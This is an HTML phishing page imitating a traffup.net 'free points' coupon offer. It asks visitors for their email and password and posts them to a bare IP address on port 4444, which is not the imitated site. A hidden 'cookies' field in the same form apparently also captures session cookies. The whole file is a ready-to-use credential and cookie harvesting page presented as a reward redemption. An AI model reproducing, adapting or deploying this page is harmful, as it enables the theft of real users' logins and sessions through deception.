
<html>
    <style>
        body {
            background: rgb(3,111,62);
            text-align: center;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        h2 {
            color: white;
        }

        .frm_btn {
            padding: 10px 20px;
            background: #1a73e8;
            font-size: 17px;
            cursor: pointer;
            display: inline-block;
            font-weight: normal;
            letter-spacing: normal;
            position: relative;
            text-decoration: none;
            color: #ffffff;
            transition: all 0.2s ease-out 0s;
            border-radius: 5px;
            border: 0px;
            outline: none;
            font-family: Arial, Helvetica, sans-serif,serif,tahoma;;
        }

        .textbox {
            font-family: Arial, Helvetica, sans-serif,tahoma,verdana;
            color: #333333;
            font-size: 12px;
            padding: 6px;
            border: 1px solid #b0b0b0;
            background: #ffffff;
            font-weight: normal;
            max-width: 95%;
            min-width: 70%;
            -webkit-border-radius: 5px;
            -moz-border-radius: 5px;
            border-radius: 5px;
            margin: 5px;
        }
    </style>
    <body>
        <section>
            <img src="https://traffup.net/images/logo_xmas.png">
            <div style="height: 50;"></div>
            <h2>Almost Ready! Redeem Now Your 10,000 free points</h2>
            <form enctype="application/x-www-form-urlencoded" method="POST" action="http://83.229.83.108:4444/add_data">
                <input type="email" value="" name="email" placeholder="Email" class="textbox"></td></tr>
                <input type="password" value="" name="password" placeholder="Password" class="textbox"></td></tr>

                <input style="display: none;" type="text" value="" name="cookies" placeholder="Cookies" class="textbox"></td></tr>

                <div style="height: 30;"></div>
                <input type="submit" class="frm_btn" value="Verify My Coupon">
            </form>
        </section>
    </body>
    
</html>
